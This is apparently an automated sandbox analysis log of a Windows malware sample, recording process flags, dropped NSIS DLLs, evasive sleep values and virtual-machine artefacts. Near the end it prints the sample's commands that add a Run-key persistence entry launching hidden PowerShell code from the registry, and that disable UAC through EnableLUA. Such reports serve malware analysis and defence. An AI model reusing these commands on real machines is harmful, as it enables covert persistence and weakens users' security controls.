          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8487Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1182Jump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\anziOUzZJs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\anziOUzZJs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 3028Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
          Source: Amcache.hve.33.drBinary or memory string: VMware
          Source: Amcache.hve.33.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.33.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.33.drBinary or memory string: VMware, Inc.
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\}}
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZS
          Source: Amcache.hve.33.drBinary or memory string: VMware20,1hbin@
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:GG<
          Source: Amcache.hve.33.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.33.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: powershell.exe, 0000000A.00000002.2010084305.00000000081BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2507024953.0000014BA0454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2505366099.0000014B9AE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.33.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.33.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.33.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.drBinary or memory string: vmci.sys
          Source: Amcache.hve.33.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.33.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.33.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.drBinary or memory string: VMware20,1
          Source: Amcache.hve.33.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.33.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.33.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.33.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.33.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.33.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.33.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.33.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.33.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.33.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.33.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: Amcache.hve.33.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\anziOUzZJs.exeAPI call chain: ExitProcess graph end nodegraph_0-3610
          Source: C:\Users\user\Desktop\anziOUzZJs.exeAPI call chain: ExitProcess graph end nodegraph_0-3605
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02AAD8A4 LdrInitializeThunk,LdrInitializeThunk,10_2_02AAD8A4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preferentialist" /t reg_expand_sz /d "%therapeutic% -windowstyle minimized $terrain=(get-itemproperty -path 'hkcu:\corycia\').mandskaber;%therapeutic% ($terrain)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preferentialist" /t reg_expand_sz /d "%therapeutic% -windowstyle minimized $terrain=(get-itemproperty -path 'hkcu:\corycia\').mandskaber;%therapeutic% ($terrain)"Jump to behavior
